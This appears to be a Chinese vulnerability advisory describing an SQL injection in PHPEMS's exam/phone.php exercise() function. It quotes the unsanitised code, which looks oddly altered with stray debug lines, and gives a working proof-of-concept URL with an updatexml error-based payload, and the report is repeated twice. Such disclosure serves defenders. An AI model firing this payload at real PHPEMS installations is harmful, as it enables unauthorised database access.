VULHUB ™

### 简要描述： PHPEMS一处SQL注入漏洞 ### 详细说明： 9． Phpems某处存在SQL注入漏洞 存在注入代码的位置在/app/exam/phone.php的exercise()函数中，具体位置在695行 $questionids = $this->question->selectQuestionsByKnows($args['knowsid'],$args['number'],$args['questid']); 这里的三个参数回溯下 if($this->ev->get('setExecriseConfig')){ $args = $this->ev->get('args'); 。。。 都是可以控制的 进入函数内部 public function selectQuestionsByKnows($knowsid,$qt) {print "start"; $knowsids = $knowsid; foreach($qt as $key => $t) {$par = 0; if(!$par) {$par++; $trand = rand(1,4); if($trand < 3) { print "hello";exit(); $qrs = $this->getRandQuestionRowsList(array("quest2knows.qkknowsid IN ({$knowsids})","questionrows.qrtype = '{$key}'","questionrows.qrnumber <= '{$t}'")); if(count($qrs)) {$qrid = $qrs[array_rand($qrs,1)]; $questionrow[$key][] = $qrid; $qr = $this->exam->getQuestionRowsByArgs("qrid = '{$qrid}'"); $t = intval($t - $qr['qrnumber']); } } } 可以看到参数$knowsids没有经过任何处理就参与到数据库数据整合中，于是造成了SQL注入漏洞 验证方法： 注册用户登录之...

### 简要描述： PHPEMS一处SQL注入漏洞 ### 详细说明： 9． Phpems某处存在SQL注入漏洞 存在注入代码的位置在/app/exam/phone.php的exercise()函数中，具体位置在695行 $questionids = $this->question->selectQuestionsByKnows($args['knowsid'],$args['number'],$args['questid']); 这里的三个参数回溯下 if($this->ev->get('setExecriseConfig')){ $args = $this->ev->get('args'); 。。。 都是可以控制的 进入函数内部 public function selectQuestionsByKnows($knowsid,$qt) {print "start"; $knowsids = $knowsid; foreach($qt as $key => $t) {$par = 0; if(!$par) {$par++; $trand = rand(1,4); if($trand < 3) { print "hello";exit(); $qrs = $this->getRandQuestionRowsList(array("quest2knows.qkknowsid IN ({$knowsids})","questionrows.qrtype = '{$key}'","questionrows.qrnumber <= '{$t}'")); if(count($qrs)) {$qrid = $qrs[array_rand($qrs,1)]; $questionrow[$key][] = $qrid; $qr = $this->exam->getQuestionRowsByArgs("qrid = '{$qrid}'"); $t = intval($t - $qr['qrnumber']); } } } 可以看到参数$knowsids没有经过任何处理就参与到数据库数据整合中，于是造成了SQL注入漏洞 验证方法： 注册用户登录之 访问localhost/ems/index.php?exam-phone-exercise&setExecriseConfig=1&args[knowsid]=1,updatexml(1,user(),1) [<img src="https://images.seebug.org/upload/201503/12185158cad6f42c30537abb31f709e9eb381f04.png" alt="xxx.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/12185158cad6f42c30537abb31f709e9eb381f04.png) OK，验证没有问题啦 ### 漏洞证明： 注册用户登录之 访问localhost/ems/index.php?exam-phone-exercise&setExecriseConfig=1&args[knowsid]=1,updatexml(1,user(),1) [<img src="https://images.seebug.org/upload/201503/12185158cad6f42c30537abb31f709e9eb381f04.png" alt="xxx.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/12185158cad6f42c30537abb31f709e9eb381f04.png) OK，验证没有问题啦